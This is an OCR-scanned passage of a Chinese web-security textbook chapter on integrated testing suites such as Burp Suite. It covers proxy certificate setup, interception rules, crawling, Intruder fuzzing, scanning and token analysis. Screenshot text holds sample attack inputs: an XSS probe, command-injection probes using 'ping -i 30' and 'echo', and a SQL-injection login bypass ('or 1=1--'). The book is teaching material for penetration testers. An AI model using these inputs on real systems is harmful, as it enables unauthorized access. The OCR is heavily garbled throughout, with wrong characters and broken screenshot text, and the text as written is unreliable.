知道 目标 服务 融 所 使 用 的 私 钥 。 

在 这 种 情况 下 ， 为 防止 攻击 , 训 览 融会 问 用 户 提 出 警告 ， 提 醒 他 们 检查 伪造 的 证 书 ， 并 有 目 行 
决定 是 否 信任 该 证 书 。 图 20-4 为 下 显示 的 徊 告 。 当 然 ， 当 使 用 拦截 代理 服务 右 时 ， 浏览 此 与 代理 
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服务 融 都 完全 由 攻击 者 控制 , 因此 它们 将 接受 伪造 的 证 书 , 并 允许 代理 服务 从 建立 两 条 SSL 信 道 。 

使 用 浏览 器 测试 使 用 单一 域 的 应 用 程序 时 , 以 这 种 方式 处 理 浏 览 器 安全 警告 和 接受 代理 服务 
船 的 目 造 证 书 通 并 不 会 遇 到 问题 。 但 是 , 在 其 他 情况 下 仍 有 可 能 出 现 问题 。 当 前 的 许多 应 用 程序 
需要 针对 图 像 、 脚 本 代码 和 其 他 资源 提出 大 量 跨 域 请 求 。 在 使 用 HTTPS 时 ,每 一 个 指 癌 外 部 域 的 
请 求 都 会 导致 浏览 硕 收 到 代理 服务 需 的 无 效 SSL 证 书 。 在 这 种 情况 下 ， 浏 览 硕 通 稍 不 会 向 用 户 提 
出 警告 ， 因 此 也 不 会 为 用 户 提供 接受 每 个 域 的 无 效 SSL 证 书 的 选项 。 相 反 ， 训 览 融 通 秆 会 于 径路 
域 请 求 ， 要 么 直接 丢弃 ,要么 显示 一 条 管 告 ， 指 出 请 求 已 被 丢弃 。 





























EO re EC 7 = 
Certificate Error: Navigation Blocked - Windows Internet Explorer 
Or" 百 https://mdsec.net/auth/4 


广 Favorites 从 Certificate Error Navigation Blocked 








网 There is a problem with this website's security certificate. 


The security certificate presented by this website was not Issued by a trusted certificate authority 


Security certificate problems may indicate an attempt to fool you or intercept any data YOU send to the 


We recommend that you close this webpage and do not continue to this website. 
哮 Click here to dlose this webpage. 


Lx) Continue to this website (not recommended). 


名 More information 





Done @ Internet | Protected Mode On {av R100% 





图 20-4 使 用 采用 HTTPS 通 信 的 拦截 代理 服务 天 将 在 攻击 者 的 浏览 锅 中 生成 警告 


使 用 在 浏览 融 以 外 运行 的 厚 客户 端 时 ， 代 理 服务 需 的 上 自 造 SSL 证 书 也 会 导致 问题 。 通 常 ， 如 
果 收 到 无 效 SSL 证 书 并 且 无 法 接受 该 证 书 ， 将 无 法 与 这 些 客 户 端 建 立 连接 。 

注 好 ， 有 一 个 简单 的 方法 可 以 解决 上 述 问题 。 在 安装 时 ，Burp Suite 会 为 当前 用 户 生 成 一 个 
唯一 的 CA 证 书 ， 并 将 该 证 书 存储 在 本 地 计算 机 上 。 当 Burp Proxy 收 到 指向 新 域 的 HTTPS 请 求 时 ， 
它 会 为 这 个 域 动态 创建 新 的 主机 证 书 ， 并 使 用 以 上 CA 证 书签 署 此 证 书 。 这 意味 着 用 户 可 以 在 其 
浏览 器 (或 其 他 信任 库 ) 中 将 Burp 的 CA 证 书 安装 为 可 信和 根 证 书 。 这 样 ， 为 所 有 主机 生成 的 证 书 
被 视 为 有 效 证 书 ， 因 而 避免 了 代理 服务 器 导致 的 所 有 SSL 错 误 。 

安装 CA 证 书 的 精确 方法 因 浏 览 絮 和 平台 而 异 。 基 本 上 ， 安 装 过程 包 括 以 下 步骤 。 

(1) 使 用 浏览 器 通过 代理 服务 需 访 问 任何 HPPTS URL。 

(2) 在 生成 的 浏 览 器 警告 中 ， 展 开 证 书 链 ， 在 证 书 树 ( 称 为 PortSwigger CA ) 中 选择 根 证 书 。 

(3) 将 此 证 书 作为 可 信 根 证 书 或 证 书 颁 发 机 构 导 入 浏览 右 。 可 能 需要 先导 出 此 证 书 ， 然 后 青 
单独 将 其 导入 ( 因 浏 览 妖 而 异 )。 
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有 关 在 不 同 浏览 大 上 安装 Burp CA 证 书 的 详细 说 明 ， 请 参阅 位 于 以 下 URL 的 Burp Suite 在 线 
文档 : 
http://portswigger.net/burp/help/servercerts.html 
elUDUDUD 
除 拦截 和 修改 请 求 与 啊 应 这 种 核心 功能 外 ， 拦 截 代 理 服 务 硕 还 包含 大 量 其 他 特性 〈 如 下 所 
示 )， 可 帮助 渗透 测试 员 提 高 攻击 Web 应 用 程序 的 效率 。 
口 详细 的 拦截 规则 。 根 据 目 标 主机 、URL 、 方 法 、 资 源 类 型 、 啊 应 码 或 出 现 的 特殊 表达 式 
( 见 图 20-5 ) 等 标准 拦截 消息 ， 然 后 审查 或 暗中 转发 这 些 消 息 。 在 一 般 的 应 用 程序 中 ， 渗 
活 测 试 员 对 绝 大 多 数 的 请 求 与 响应 都 不 感 兴趣 ， 他 可 以 利用 这 项 功能 配置 代理 服务 硕 仅 
标记 感 兴趣 的 消息 。 


一 






























































































































































RN Te a 
$burp suite professional EE EX 
burp intruder repeater window about 
target proxy spider scanner | intruder 价 repeater sequencer | decoder | comparer | options | aleris | 
intercept | options | history 有 
intercept client requests Ca 
[lw] intercept 证 [lx] update Content-Lengith 
四 [file extension |does notmatch |(AgifgjpgS$lApngSlscss$. edit [中 | 
回 |or request contains parameters | 
加 |or HTTP method does not match |(getlpost) . remove _ | 
Eland IURL lis in target scope | 
Up 
down 
rol [oomamname [w] Imacnes | a 
intercept server responses 
lw] intercept Ix] update ContentLength 
四 | contenttype Imatches a edit | [9| 
回 |or request |was modified 
划 |or request |was intercepted | remove 
lland response code does not maich |*3045 
中 and URL is in target scope | up 
Jy down 
and -| domain name ba matches ba | | add 




















图 20-5 Burp 代 理 服务 表 文 持 话 细 的 请 求 与 啊 应 拦截 规则 








口 所 有 请 求 与 啊 应 的 详细 历史 记录 。 通 过 它 可 审查 之 前 传送 的 消息 ， 并 可 将 它们 传送 给 套 
件 中 的 其 他 工具 ， 以 进行 深入 分 析 ( 参见 图 20-6 )。 可 以 过 滤 和 搜索 拦截 历史 记录 ， 从 而 
迅速 查找 特定 数据 项 ， 还 可 以 标注 感 兴趣 的 条 目 ， 以 便 将 来 引用 。 

口 用 于 动态 修改 请 求 与 啊 应 内 容 的 目 动 匹配 与 蔡 换 规则 。 这 项 功能 的 用 途 广泛 ， 例 如 ， 在 
所 有 请 求 中 修改 某 个 cookie 或 其 他 参数 的 值 ， 删 除 绥 存 指令 ， 用 User-aAgent 消 息 头 模拟 
某 个 特殊 的 浏览 器 ， 等 等 。 

口 除 客户 喘 UI 外， 直接 通过 浏览 带 访 问 代 理 服务 右 的 功能 。 渗 透 测试 员 可 以 使 用 这 项 特性 
浏览 代理 历史 ， 从 浏览 希 中 重新 发 布 请 求 ， 从 而 以 正 浓 方式 处 理 并 拦截 啊 应 。 
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ER burp uite pro fes sional | 四 到 Ex | 


burp iniruder repeater window about 





repeater | sequencer | decoder comparer options alerts | 


target 人 proxy spider | scanner | intruder 


intercept | options | history 
Filter: hiding CSS, imzge and general binary content 

= host URL p length | MIME type| extension 
0 和 


一 一 一 一 一 
7 lhttp//mdsec.net | Isearchi11/Defaultaspx | 
8 http://mdsec.net Jsearchj11/Defaultaspx | 
9 








1725 “|HTML 
[1722 |HTML 
1775 |HTML 
1773 








Object moved 
| | 











http/imdsec.net /search!11/De 

















ttpJJmdsec.net 











original request edited request response 


raw | headers | hsx | html | render | viewstate 


<input name="SearchTerm’" type="text" value="&]lt;script>alert (1) &lt;/script>"' 





" id="SearchTerm" 








/> 
Enbhsp;<input type="submit" name="SearchButton" value="Search" id="SearchButton" /> 


<Qivw id="ExtraFields'"><input name="searchtype" type="hidden" value="l"></div> 





<a href="Recent .aspx">View recent searches</a> 











恬 列 | 棋 习 | 恬 习 | 











图 20-6 ”代理 服务 器 历史 记录 ， 人 允许 攻击 者 通过 代理 服务 器 查看 、 过 滤 、 搜 索 和 标记 
请 求 和 啊 应 
口 操纵 HTTP 消 息 格 式 的 实用 工具 ， 如 在 不 同 的 请 求 方法 与 内 容 编码 之 间 进 行 转换 。 有 时 ， 
渗透 测试 员 还 可 以 使 用 这 些 工 具 优 化 路 站 点 脚本 之 类 的 攻击 。 
口 能 够 实时 目 动 地 修改 某 些 HTML 特 性 , 如 显示 隐藏 表单 字段 , 删除 输入 字段 限制 以 及 删除 
JavaScript 表 单 确认 。 


2. Web 应 用 程序 拒 虫 
Web 应 用 程序 候 虫 的 工作 机 制 与 传统 的 Web 息 虫 类 似 : 请 求 Web 页 面 ， 解 析 这 些 页 面 ， 从 中 


查找 指向 其 他 页 面 的 链接 , 然后 向 它们 提出 请 求 ; 继续 这 个 过 程 , 直到 查 明 一 个 站 点 的 全 部 内 容 。 
为 适应 功能 性 Web 应 用 程序 与 传统 Web 站 点 之 间 的 差异 ,应 用 程序 爬虫 不 仅 需要 实现 其 核心 功能 ， 


还 要 应 对 其 他 各 种 挑战 ， 如 下 所 示 。 

口 基于 表单 的 导航 ， 使 用 下 拉 列 表 、 文 本 输入 和 其 他 方法 。 
口 基于 JavaScript 的 导航 ， 如 动态 生成 的 来 单 。 20 
口 要 求 按 预定 顺序 执行 操作 的 多 阶段 功能 。 
口 验证 与 会 话 。 
口 使 用 基于 参数 的 标识 符 ， 而 非 URL， 指 定 不 同 的 内 容 与 功能 。 
口 在 URL 查 询 字 符 串 中 出 现 令 牌 和 其 他 易 变 参数 ， 导 致 确定 特殊 内 容 出 现 问题 。 
集成 测试 套件 通过 在 拦截 代理 服务 需 与 朴 虫 组 件 之 间 共 吾 数 据 , 解决 了 上 述 几 个 问题 .这样 ， 

渗透 测试 员 就 能 够 以 正常 方式 使 用 目标 应 用 程序 ， 由 代理 服务 絮 处 理 所 有 请 求 ,并 将 其 提交 给 的 

虫 进 行 深 和 分析。 因此 ,浏览 硕 将 会 留意 任何 不 篆 见 的 导航 、 验 证 与 会 话 处 理 机 制 ， 人 允许 渗透 测 
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试 员 完 全 控制 朴 贝 ， 彻 确 搜 索 应 用 程序 的 内 容 。 这 种 由 用 户 指 导 的 抓 取 技 巧 已 在 第 4 章 话 细 介绍 
了 了。 收集 到 尽 可 能 多 的 信息 后 ， 故 虫 就 可 以 目 行 进行 逆 和 调查， 进而 发 现 其 他 内 容 与 功能 。 
下 面 是 web 应 用 程序 爬虫 所 执行 的 稼 用 功能 。 
D 使 用 通过 拦截 代理 服务 硕 访 问 的 URL 目 动 更 新 站 点 地 图 。 
口 被 动 抓 取 代理 服务 右 人 处 理 的 内 容 ， 从 中 解析 出 链接 ， 无 须 请 求 这 些 链接 就 将 它们 添加 到 
站 点 地 图 中 ( 见 图 20-7 )。 

















| target | proxy spider | scanner | intruder | repeater sequencer | decoder | comparer | options | alerts 


sitemap | scope 


9- httpmdsecnet 
1 Sear 

o- 向 ] addressbook http://mdsec.net IPOST |/search/11/Default.aspx 

~ 向 admin hitp//mdsecnet POST |/search/11/Default.aspx 

E hitp://mdsec.net IPOST l/search/11/Default.aspx 

hitp://mdsec.net |POST earcn lp eeu tasp 








c 各 | au 了 h 


入 仿 cdookup http-mdsecnet |GET l/search/103/ 
癌 defautthtml http-mdsecnet |GET l/search/106/ 

~ 和 语 | employees 

~ 请 | error 和 : 

全 人 Nestore response | request 


~ lsearch| ‘Taw | headers | hex | html | render | viewstate 


~ 筷 | settings HTTP/1.1 200 OK 
~ 和 shop Date: Thu，14 Apr 2011 14:04:39 GMT 
co 户 | transfer Server: Microsoft-IIS/6.0 
o- 向 ] updates MicrosoftOfficeWebsServer: 5.0 Pub 
X-Powered-By: ASP.NET 
~~ 癌 https:imdsecnet 
































X-AspNet-Version: 2.0.50727 
Cache-Control: private 

Content-Type: text/html; charset=utf-8 
Content-Length: 1419 


<!DOCTYPE htmil PUBLIC "=//W3C//DTD XHTNL 1.0 
Transitional//EN" 
Wnt tn /mm 3 Arrr/TR/vhtmil1 /DTN/yhtmli-transitinnal AtaArschrt 


[jz<jL> | | 0matches 
































图 20-7 被动 抓 取 绪 采 ， 以 灰色 显示 的 条 目 没 有 经 过 请 求 ， 但 通过 被 动 抓 取 确认 了 


口 以 表格 和 树 状 形式 呈现 所 发 现 的 内 容 ， 方 便 对 这 些 结果 进行 搜索 。 

口 对 目 动 抓 取 的 旋 围 进行 细 化 控制 。 这 样 就 可 以 指定 仆 忠 抓 取 的 主机 名 称 、IP 地 址 、 目录 路 
径 、 文 件 类 型 等 ， 以 对 某 一 个 特殊 的 功能 区 域 进行 抓 取 ， 防 止息 虫 访问 目标 应 用 程序 基 
础 架构 之 内 或 之 外 的 无 关 链 接 。 这 项 功能 还 有 助 于 防止 仆 虫 抓 取 管理 接口 之 类 的 强大 功 
能 ， 因 为 这 样 做 可 能 会 导致 危险 的 负面 影响 ， 如 删除 用 户 账 户 。 它 还 可 用 于 防止 疏 虫 请 
求 退出 功能 ， 使 当前 会 话 失效 。 

口 目 动 解析 HTML 表 单 、 肢 本、 注释 和 图 人像， 并 在 站 点 地 图 内 分 析 这 些 内 容 。 

口 解析 JavaScript 内 容 ， 查 找 URL 与 资源 名 称 。 即 使 应 用 程序 并 没有 使 用 完整 的 JavaScript3| 
擎 ， 这 项 功能 也 有 助 于 候 虫 发 现 基 于 JavaSceript 的 导航 ， 因 为 它们 通 和 常 以 字面 量 的 形式 出 
现在 脚本 中 。 

口 使 用 适当 的 参数 根据 用 户 的 指导 自动 提交 表单 ( 见 图 20-8 )。 
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CT mee 
$ submit form Fe 区 本 

Burp Spider needs your guidance to submit a login form. Please choose the value of each form 

field which should be used when submitting the form. You can control how Burp handles forms in 


the Spider options tab. 


action URL: https:J/mdsec.netiauth/4/Default.ashx 
method POST 


type | name | value 





text lusermame 


passwordlpassword 

















| , | | 
| submitform || ignoreform | 








图 20-8 ”Burp 疏 虫 根据 用 户 的 指导 提交 表单 





口 探查 自 定 义 的 “文件 未 发 现 ” 啊 应 。 当 请 求 一 个 无 效 的 资源 时 ， 许 多 应 用 程序 返回 一 条 
HTTP 200 消 息 。 如 果 疏 虫 无 法 识别 这 种 消息 ， 得 到 的 内 容 地 图 就 可 能 包含 错误 信息 。 
口 检查 robots.txt 文 件 , 该 文件 提供 一 份 列 出 禁止 抓 取 的 URL 黑 名 单 , 但 攻击 爬虫 可 以 利用 它 
发 现 其 他 内 容 。 
口 自动 获取 所 有 枚 举 出 的 目录 的 根 目 录 。 这 些 内 容 可 用 于 检查 目录 列表 或 默认 内 容 (请 参 
阅 第 17 曹 了解 相 关内 容 )。 
口 自动 处 理 和 使 用 由 应 用 程序 发 布 的 cookie， 在 通过 验证 的 会 话 中 进行 抓 取 。 
口 自动 测试 每 个 页 面 的 会 话 依 赖 性 。 这 包括 使 用 和 不 使 用 收 到 的 cookie 请 求 的 每 个 页 面 。 如 
果 提 出 的 两 种 请 求 得 到 相同 的 内 容 ， 那 么 该 页 面 不 需要 会 话 或 验证 即 可 访问 。 这 种 功能 
可 用 于 探查 一 些 访 问 控制 漏洞 〈 请 参阅 第 8 章 了 解 相关 内 容 )。 
口 发 布 请 求 时 上 自动 使 用 正确 的 Referez 消 息 头 。 一 些 应 用 程序 可 能 会 检查 这 个 消息 头 的 内 
容 ， 这 项 功能 可 确保 怜 虫 尽 可 能 以 类 似 于 普通 浏览 需 的 方式 运行 。 
口 控制 在 自动 抓 取 过 程 中 使 用 的 其 他 HTTP 消 息 头 。 
口 控制 提出 的 自动 抓 取 请 求 的 速度 与 上 顺序， 避免 这 些 请 求 令 攻击 目录 毅 省; 如 有 必要 ， 确 
保 抓 取 在 隐秘 状态 下 进行 。 
3. 应 用 程序 测试 器 
虽然 仅 使 用 手动 技巧 也 可 以 成 功 实施 攻击 ,但 是 ， 要 成 为 一 名 真正 成 熟 的 Web 应 用 程序 渗透 
测试 员 ， 必 须 在 攻击 过 程 中 利用 自动 化 工具 ,提高 攻击 速度 与 效率 。 第 14 章 已 经 详细 介绍 了 如 何 
使 用 自动 化 工具 。 集成 测试 套件 中 的 每 一 个 工具 都 具有 自动 完成 各 种 常见 任务 的 功能 。 以 下 是 各 
种 工具 套件 的 主要 功能 。 
口 手动 配置 常见 漏洞 扫描 。 滩 透 测试 员 可 以 利用 这 项 功能 准确 控制 使 用 哪些 攻击 字符 串 ， 
以 及 如 何 将 它们 合并 到 请 求 中 并 审查 其 结果 ， 确 定 任何 有 助 于 深入 调查 的 不 常见 的 或 反 
第 的 响应 。 



























































口 一 组 内 置 的 攻击 有 效 载 傈 和 易 变 图 数 ， 以 用 户 定 义 的 方式 生成 任意 有 将 载 傈 。 例 如 ， 根 
据 畸 形 编 码 、 字 符 置 换 、 蛮 力 、 从 前 某 个 攻击 中 获得 的 数据 等 。 

口 能 够 保存 扫描 啊 应 数据 ， 将 其 用 在 报告 中 ， 或 者 合并 到 其 他 攻击 中 。 

口 查看 和 分 析 啊 应 的 定制 化 功能 。 例 如 ， 可 根据 特定 表达 式 或 有 效 载 集 自 身 是 否 出 现 查 看 
和 分 析 啊 应 〈 人 参见 图 20-9 )。 


$intruder attack 5 
attack save columns 
Filter: showing all ilems 

results | target | positions | payloads options 

|_request | position payload 
0 


jxsstest 


</foo> 
llping -i 30 127.0.0... 
.echo 111111 


oD 
省 
ee 
已 
各 


.|quota..| syntax comment 
lbaseline request 








匡 攻 ] 
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四 加 四 下 
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[EE]E] 
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< 上 00> 
lping 了 3012700 


echo 111111 
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”Trentder 


name="username" type="text" 
value="'"/></-d><td>Enhsp;</td></tr><tr><td>Password:</td><td><input 
name="passvword" type="password" value=""/S</-d><tds<input type="submit" 
value="Lodgin" /></td></tr></table></form><br/><a 
href="Redgiste-.ashx">Register</a><br><br><hr>Unclosed quotation mark after the 
character string '''! 

Incorrect syntax near '''.</body></html> 








图 20-9 ”使 用 Burp Intruder 测 试 漏洞 练习 的 结 


口 从 应 用 程序 的 啊 应 中 提取 有 用 数据 的 功能 。 例 如 ， 从 “用 户 资 料 ” 页 面 解析 用 户 名 和 密 
码 字 段 。 当 利用 会 话 处 理 和 访问 控制 等 漏洞 时 可 以 用 到 这 项 功能 。 

4. Web 漏 洞 扫 描 器 

一 些 集成 测试 套件 提供 扫描 常见 Web 应 用 程序 源 洞 的 功能 ， 所 执行 的 扫 搬 主要 分 为 以 下 两 


口 被 动 扫描 ， 包 括 监视 通过 本 地 代理 服务 需 传 递 的 请 求 和 啊 应 ， 以 确定 各 种 漏洞 ， 如 提交 
明文 密码 、cookie 配 置 错误 以 及 路 域 Referer 浊 露 。 可 以 以 非 和 人 侵 的 方式 对 使 用 浏览 需 访 问 
的 任何 应 用 程序 执行 此 类 扫描 。 在 确定 渗透 测试 的 效果 时 ， 此 功能 往往 非常 有用， 通过 
它 可 以 确定 应 用 程序 相对 于 上 述 漏 洞 的 安全 状态 。 

口 主动 扫描 ， 包 括 向 目标 应 用 程序 发 送 请 求 来 探查 各 种 漏洞 ， 如 鉴 站 点 脚本 、HPPT 消 息 头 
注入 和 文件 路 径 裔 历 。 和 任何 其 他 主动 测试 一 样 ， 此 类 测试 可 能 会 非常 危险 ， 只 有 在 获 
得 应 用 程序 所 有 者 的 同意 后 才 可 以 实施 。 
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相 比 于 本 章 后 面部 分 讨论 的 独立 扫描 需 , 测试 套件 中 包含 的 漏洞 扫描 必需 要 用 户 执行 更 多 配 
置 。 用 户 不 能 仅仅 提供 起 始 URL 并 让 扫描 需 抓 取 和 测试 应 用 程序 ,相反 , 用 户 可 以 指示 扫描 磺 如 
何 测试 应 用 程序 ， 精 确 欣 制 扫描 哪些 请 求 ， 并 收 到 有 关 单 个 请 求 的 实时 反馈 。 以 下 是 集成 测试 套 
件 扫描 功能 的 一 些 典 型 用 法 。 

口 手动 解析 应 用 程序 的 内 容 后 ， 可 以 选择 站 点 地 图 中 感 兴趣 的 功能 区 域 并 由 扫描 噩 扫描 这 

些 区 域 。 这 有 助 于 将 可 用 时 间 用 于 扫描 最 关键 的 区 域 ， 并 更 迅速 地 获得 扫描 结 

口 手动 测试 单个 请 求 时 ， 作 为 补充 ， 可 以 在 测试 时 扫描 每 个 特定 的 请 求 。 这 样 做 可 以 立即 

获得 与 这 些 请 求 包含 的 常见 漏洞 有 关 的 反馈 ， 从 而 为 手动 测试 提供 指导 并 对 其 进行 优化 。 
口 可 以 使 用 自动 抓 取 工 具 抓 取 整 个 应 用 程序 ， 然 后 扫描 发 现 的 所 有 内 容 。 这 个 过 程 与 独立 
Web 扫 描 融 的 基本 行为 类 似 。 

口 在 Burp Suite 中 ,可 以 在 浏览 妖 中 激活 实时 扫描 , 然后 使 用 浏览 旭 指 导 扫 描 帮 的 扫描 记 围 ， 
并 迅速 收 到 与 提出 的 每 个 请 求 有 关 的 反馈 ， 而 无 须 手 动 确定 要 扫描 的 请 求 。 图 20-10 显 示 
了 实时 扫描 的 结 


burp iniruder repeater Window about 























| target | proxy | spider “scanner | intruder repeater sequencer decoder | comparer "options alerts 


“Tesults | scan queue | live scanning | options 






9 hitpsilimdsecnet 





~ & SQL injection [4] 





















CIOSE e Scnpung (st 
9 3 httpmdsecnet 向 HTTP header injection 
o- &¥ addressbook & Cross-site scripting (reilected) 
co admin 人 [$9] Cleartext submission of password [4] 
~ auth ? OS command injection 
~ 0 cclookup 1 File path traversal 


让 default.htmi 
~ 9? employees 
~ 时 flestore 


~ 外 XPath injection [2] 
? LDAP injection 


Open redirection 
本 Passwordfield with autocomplete enabled [2] 


入 2 search 

co- 和 setiings 0 ? XMLinjection [3] 

人 ? transfer 下 Cookie Without HitpOnly flag set 
o- OY updates File upload functionality 


生 Email addresses disclosed 
让 Robots.txt file 
~ 站 HTML does not specify charset [2] 
直 Contenttype is not specified 
让 ASPNET debugging enabled 
站 Directory listing [2] 














" request1 request2 | response2 


0 Cross-site scripting (stored) 





Issue: Cross-site scripting (stored) 
Sewerity- High 

Confidence: Certain 

Host httpJimdsec.net 

Paith: lIsearch/11/Recent.aspx 


Issue detail 









The value of the SearchTerm request parameter submitted to the URL 
/search/11/Default.aspx is copied into the HTML document as plain text between tags at 
the URL /search/11/Recent.aspx. The payload 
365fb<script>alert(1)}</script>f0a8de3d0d5 was submitted in the SearchTerm 
parameter. This input was returned unmodified in a subsequent requestforthe URL 
/search/11/Recent.aspx. 

















图 20-10 ”使 用 Burp Scanner 浏 览 时 的 实时 扫描 结果 
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虽然 集成 测试 套件 中 的 扫 摘 融 的 设计 用 途 不 同 于 独立 扫描 融 , 但 是 , 我 们 将 在 本 章 后 面部 分 
讲 到 , 在 某 些 情况 下 , 这 些 扫描 需 的 核心 扫描 引擎 非常 强大 , 其 能 力 甚 至 优 于 主流 的 独立 扫描 堆 。 

5. 手动 请 求 工具 

发 布 一 个 请 求 并 查看 它 的 啊 应 是 集成 测试 套件 中 的 手动 请 求 组 件 的 基本 功能 。 虽 然 非 党 简 
单 ,， 但 在 以 下 情况 下 ， 这 项 功能 可 提供 极 大 帮助 : 尝试 性 地 探查 一 个 漏洞 ， 需 要 多 次 手动 发 布 同 
一 个 请 求 ， 并 调整 请 求 元 率 以 确定 应 用 程序 的 行为 所 受到 的 影响 。 当 然 , 也 可 以 使 用 一 个 独立 的 
工具 ( 如 Netcat ) 来 完成 这 项 任务 。 但 是 ， 如 果 将 这 项 功能 内 置 在 套件 中 ， 就 可 以 迅速 从 其 他 组 
件 〈 代 理 服 务 硕 、 爬 虫 或 漏洞 测试 融 ) 中 获取 感 兴趣 的 请 求 ， 对 其 进行 手动 调查 。 而 且 ， 手动 请 
求 工具 还 可 以 得 益 于 套件 执行 的 各 种 共享 功能 , 如 HTML 呈 现 、 支持 下 行 代 理 ( downstream proxy ) 
与 验证 、 自 动 上 传 content-Length 消 息 头 。 图 20-11 是 一 个 手动 重新 发 布 的 请 求 。 


























人 OE | J 三 EN 
全 burp suite professional oo 


burp iniruder repeater window about 








「 target | proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts | 


1 [We 
go nce host |mdsecnet | follow redirect 
i | port |443 | ”四 useSSL 


request 

















raw | params | headers | hex | 


POST /auth/319/Default.ashx HTTP/1.1 | 全 
Referer: https://mdsec.net/auth/319/Default.ashx 

User-Aygent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 
sms NET GLRSISSraDa NET GLRSISHOOr29 NETASHUG: 区 EGR ssNETAHE: EDN “SNET GER 
LiL 4322) 

Content-Type: application/x-www-form-urlencoded 

Host: mdsec.net 

Content-Length: 38 








username=adminégépassvword=test'+or+l1=1—— 








1 要 


EE ] omatches 


response 























raw | headers | hex | html | render 


HTTP/1.1 302 Found 

Date: Thuj 14 Apr 2011 14:58:29 .GT 

Server: Microsoft-IIS/6.0 

MicrosoftOfficeWebSserver: 5.0 Pu 

X-Powered-By: ASP.NET 

X-AspNet-Version: 2.0.50727 

Location: /auth/319/Home.ashx 

Set-Cookie: Sessionld=29541F19F14889E4022214C91632B9DB; secure; HttpOnly 








Cache-Control: no-cache 

Pradgma: no-cache 

Expires: -1 

Content-Type: text/html; charset=utf-8 
Content-Length: 142 


<html><head><title>0hject moved</title></head><body> 
<h2>0bject moved to <a href="s2fauth$s2f319$2fHome.ashx">here</a>.</h2> 
</body></html> 























Lt | < >|| | 0 matches 


length: 553 (272 milis)| 
图 20-11 使 用 Burp Repeater 手 动 重新 发 布 的 请 求 
以 下 是 各 种 手动 请 求 工具 的 主要 功能 。 
口 与 其 他 套件 组 件 相互 整合 ， 能 够 与 其 他 组 件 相互 传递 任何 请 求 ， 以 进行 深入 调查 。 
口 保存 所 有 请 求 与 啊 应 的 历史 记录 ， 完 整 记录 所 有 手动 请 求 ， 以 方便 进一步 审查 。 同 时 还 
能 够 获取 一 个 之 前 已 经 修改 的 请 求 ， 以 进行 深入 分 析 。 
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口 包含 多 个 选项 卡 的 界面 ， 一 次 可 以 处 理 儿 个 不 同 的 项 目 。 

口 能 够 自动 跟踪 重 定 问 。 

6. 会 话 令 牌 分 析 器 

一 些 测试 套件 提供 各 种 分 析 功 能 ， 可 用 于 分 析 应 用 程序 使 用 的 需要 不 可 预见 性 的 会 话 cookie 
和 其 他 令 牌 的 随机 性 。Burp Sequencer 是 一 种 强大 的 工具 ， 可 以 对 任意 大 小 的 令 牌 样本 的 随机 性 
进行 标准 的 统计 测试 ， 并 以 可 访问 的 格式 提供 详细 结果 。 图 20-12 显 示 了 Burp Sequencer 工 具 ， 有 
关 该 工具 的 详情 ， 请 参阅 第 7 章 。 




















器 auto analyse (next 1500) requests: 1204 
| savetokens | | anaysenow | errors: 0 


summary | character-level analysis | bitlevel analysis | options 


FIPS runs test | FIPS long runs test | spectraltests | correlation | compression | bit conversion 


summary FIPS monobittest | FIPS pokertest 

















FIPS long run test - significance levels 


100% 


EE 一 一 ] FIPS pass level 
0 10 20 30 40 50 60 


bit position 


FIPS result 


59 bits passed the test. The following 4 bits failed the test: 11, 25, 26, 27. Note that the FIPS Specification for this test only records a fail the 
longest run of bits is overly long. However, an overly short longest run of bits also indicates that the sample is notrandom. Therefore some bits 
may record a Significance level that is below the FIPS pass level even thoygh they do not strictly fail the FIPS test. 











图 20-12 ”使 用 Burp Sequencer 测 试 应 用 程序 会 话 令 牌 的 随机 性 


7. 共享 功能 与 实用 工具 
除 核心 组 件 外 ， 集 成 测试 父 件 还 提供 大 量 其 他 “附加 值 ” 功 能 ， 以 满足 渗透 测试 员 在 攻击 
Web 应 用 程序 时 面临 的 特殊 需求 。 以 下 是 各 种 套件 的 主要 功能 。 
口 分 析 HTTP 消 息 结构 ， 包 括 解 析 消 息 头 与 请 求 的 参数 ， 以 及 解压 常见 序列 化 格式 ( 见 
图 20-13 )。 
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看 








Tp a FE: 本- 医 


burp intruder repeater Window about 








( target | proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts | 
| intercept | options | history | 


自 requestio nttps/mdsecnet443 [1/2.16.50.129] 














| forward || drop | intercept is on | action 








( raw | params | headers | hex | 





POST reguest to /auth/4/NewUserStep2.ashx 

type | name | _ NE 
|Sessionld |6E8DECA9228A450ADED2D34137B0C6F5 
_jrealname |Matthew+Adamson 

lusername fatadam 

luserrole |uSer 

|password |4nllub3 

Iconfirmpassword 4nllub3 









































noncE |yes 














body encoding: application/x-www-form-urlencoded 











图 20-13 ”分析 请 求 与 响应 的 HTTP 结 构 与 参数 


口 在 啊 应 中 呈现 HTML 内 容 ， 就 像 在 浏览 硕 中 那样 。 

口 能 够 以 文本 和 十 六 进 制 格式 显示 和 编辑 消息 。 

口 所 有 请 求 与 啊 应 中 的 搜索 功能 。 

口 手动 编辑 消息 内 容 后 ， 目 动 上 传 HTTP content-Length 消 息 头 。 

口 内 置 编码 旨 与 解码 右 ， 能 够 迅速 分 析 cookie 与 请 求 参 数 中 的 应 用 程序 数据 。 

口 比较 两 个 啊 应 ， 突 出 显示 其 不 同 之 处 。 

口 目 动 化 内 容 发 现 与 攻击 面 分 析 。 

口 能 够 在 磁盘 上 保存 当前 测试 会 话 ， 并 检索 已 保存 的 会 话 。 

口 文 持 “下 行 ”代理 和 SOCKS 代 理 ， 人 允许 将 不 同 的 工具 组 合 在 一 起 ， 或 者 通过 所 在 的 组 织 
或 ISP 使 用 的 代理 服务 融 访 问 应 用 程序 。 

口 在 工具 内 文 持 HTTP 验 证 方法 ， 人 允许 在 应 用 这 些 方 法 的 环境 〈 如 企业 局 域 网 ) 中 使 用 套件 
的 所 有 功能 。 

口 文 持 客户 端 SSL 证 书 ， 人 允许 攻击 使 用 这 些 证 书 的 应 用 程序 。 

口 处 理 更 隐蔽 的 HTTP 特 性 ， 如 gzip 内 容 编 码 、 块 传输 编码 与 状态 码 为 100 的 过 渡 啊 应 。 

口 可 扩展 性 ， 使 用 第 三 方 代 码 可 任意 修改 和 扩展 内 置 功 能 。 

口 可 以 安排 各 种 常规 任务 ， 如 抓 取 和 扫描 ， 而 无 须 手动 控制 。 

口 保留 工具 选项 配置 ， 帮 助 在 下 次 运行 套件 时 恢复 到 某 个 特殊 设置 。 

